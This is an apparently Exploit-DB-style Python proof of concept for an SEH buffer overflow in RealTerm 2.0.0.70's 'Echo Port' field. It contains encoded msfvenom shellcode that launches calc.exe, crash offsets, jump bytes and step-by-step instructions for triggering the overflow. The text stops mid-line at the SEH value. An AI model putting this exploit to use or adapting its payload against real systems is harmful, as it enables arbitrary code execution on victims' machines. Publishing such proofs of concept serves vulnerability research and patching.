#!/usr/bin/python # Exploit Title: RealTerm: Serial Terminal 2.0.0.70 - 'Echo Port' Buffer Overflow - (SEH) # Version: 2.0.0.70 # Credits to: Alejandra Sanchez for finding initial DoS # https://www.exploit-db.com/exploits/46391 # Matteo Malvica for creating initial PoC # https://www.exploit-db.com/exploits/46441 # Differences: - Uses a larger space for shellcode, 260 bytes, due to more precise jumping and less NOP padding # - Filtered on char 0x3a representing ":", which causes "Invalid port" error in program # Date: 06-03-2019 # Author: Hodorsec (hodorsec@protonmail.com / hodor@hodorsec.com) # Vendor Homepage: https://realterm.sourceforge.io/ # Software Link: https://sourceforge.net/projects/realterm/files/ # Tested on: Win7 x86 SP1 build 7601, Win8 6.3 build 9600 # Caveats: SEHOP disabled in registry, although this is also true for PoC EDB-ID 46441 since the PoC wouldn't work otherwise # 1.- Run the python script it will create a new file as indicated by "filename" variable # 2.- Copy the content of the created file to clipboard # 3.- Open realterm.exe # 4.- Go to 'Echo Port' tab # 5.- Paste clipboard in 'Port' field # 6.- Click on button -> Change # 7.- Check 'Echo On' # 8.- Result import sys, struct filename = "sploit_realterm_custom-calc_x86.txt" # Shellcode # msfvenom -p windows/exec cmd=calc.exe -a x86 --platform windows -v shellcode -f python -b "\x0a\x0d\x00\x3a\x20" # Payload size: 220 bytes shellcode = "" shellcode += "\xbf\x83\xe7\x1e\x48\xd9\xec\xd9\x74\x24\xf4\x58" shellcode += "\x33\xc9\xb1\x31\x31\x78\x13\x03\x78\x13\x83\xc0" shellcode += "\x87\x05\xeb\xb4\x6f\x4b\x14\x45\x6f\x2c\x9c\xa0" shellcode += "\x5e\x6c\xfa\xa1\xf0\x5c\x88\xe4\xfc\x17\xdc\x1c" shellcode += "\x77\x55\xc9\x13\x30\xd0\x2f\x1d\xc1\x49\x13\x3c" shellcode += "\x41\x90\x40\x9e\x78\x5b\x95\xdf\xbd\x86\x54\x8d" shellcode += "\x16\xcc\xcb\x22\x13\x98\xd7\xc9\x6f\x0c\x50\x2d" shellcode += "\x27\x2f\x71\xe0\x3c\x76\x51\x02\x91\x02\xd8\x1c" shellcode += "\xf6\x2f\x92\x97\xcc\xc4\x25\x7e\x1d\x24\x89\xbf" shellcode += "\x92\xd7\xd3\xf8\x14\x08\xa6\xf0\x67\xb5\xb1\xc6" shellcode += "\x1a\x61\x37\xdd\xbc\xe2\xef\x39\x3d\x26\x69\xc9" shellcode += "\x31\x83\xfd\x95\x55\x12\xd1\xad\x61\x9f\xd4\x61" shellcode += "\xe0\xdb\xf2\xa5\xa9\xb8\x9b\xfc\x17\x6e\xa3\x1f" shellcode += "\xf8\xcf\x01\x6b\x14\x1b\x38\x36\x72\xda\xce\x4c" shellcode += "\x30\xdc\xd0\x4e\x64\xb5\xe1\xc5\xeb\xc2\xfd\x0f" shellcode += "\x48\x3c\xb4\x12\xf8\xd5\x11\xc7\xb9\xbb\xa1\x3d" shellcode += "\xfd\xc5\x21\xb4\x7d\x32\x39\xbd\x78\x7e\xfd\x2d" shellcode += "\xf0\xef\x68\x52\xa7\x10\xb9\x31\x26\x83\x21\x98" shellcode += "\xcd\x23\xc3\xe4" # Maximum length maxlen = 1000 # Crash offsets crash_nseh = 268 crash_seh = crash_nseh + 4 # JMP offset ret_jmp = 262 # Padding pad = "\x90" * 2 # Variables prefix = pad # Initial padding prefix += shellcode # Custom shellcode, max size 260 bytes prefix += "B" * (ret_jmp - len(prefix)) # Filler until return point of negative jump prefix += "\xE9\xF7\xFE\xFF\xFF" # JMP 0xFFFFFEFC # Jmp to beginning of buffer prefix += "C" * (crash_nseh - len(prefix)) # Filler until return point of NSEH negative jump nseh = "\xeb\xf8\x90\x90" # JMP SHORT 0x8 # NOP # NOP seh = struct.pack("